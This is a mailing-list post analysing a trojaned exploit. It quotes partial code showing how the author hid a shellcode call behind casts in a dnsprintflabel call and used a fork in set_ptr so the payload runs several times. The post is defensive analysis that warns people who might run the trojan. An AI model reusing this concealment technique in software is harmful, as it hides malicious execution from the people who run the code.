Below I have excerpted the obvious pieces of the trojan.  The functions
which do the deed are set_ptr, and the call to dnsprintflabel.

I just thought some people may have wanted to know how the person who
wrote the trojan hid the shellcode among the seemingly correct exploit.


*** set_ptr does the fork dance.

set_ptr(char *buff, int offset, unsigned long val, int s)

                if (!fork())

*** After the above fork, child does meaningless memcpy and
*** returns to main, causing multiple executions of the trojan
*** shellcode.

        memcpy(buff, copy_buff, sizeof(copy_buff));
        return 0;

*** dnsprintflabel has a lot of crap code in it, but it
*** isn't this function that does the deed, it's the
*** arguments to the function.

/* pull out a compressed query name */
char           *
dnsprintflabel(char *s, char *buf, char *p)
        return (p);

*** This is the actual code that does the running of the shellcode.
*** In it he hides a lot of useless casts to hide the inline prototype
*** of the call to the shellcode.

         * encode packet ...
        dnsprintflabel(remote_addr, (char *) (expl_buffer + sizeof(HEADER)),
                 (char *) ((unsigned long) &expl_buffer[0] + sizeof(HEADER) + 1));

                 This is the carefully typecasted prototype for the shellcode, he
                 just skips all the header and pointer crap to actually run the
                 shellcode.  The &expl_buffer[0] + sizeof(HEADER) + 1 is actually
                 just the shellcode he copied from the buffers above, hidden behind
                 some custom types and stuff.

                 EXPLANATION: The & dereference just returns the pointer of the array
                 element at the calculated offset (sizeof(HEADER) +1).  The thing that
                 gives this away as a function call is the extra set of parentheses
                 after the typecast, this is the lexicon for an inline function 

Perry Harrington                 Director of                   zelur xuniL  ()
[EMAIL PROTECTED]             System Architecture               Think Blue.  /\

PGP signature

Reply via email to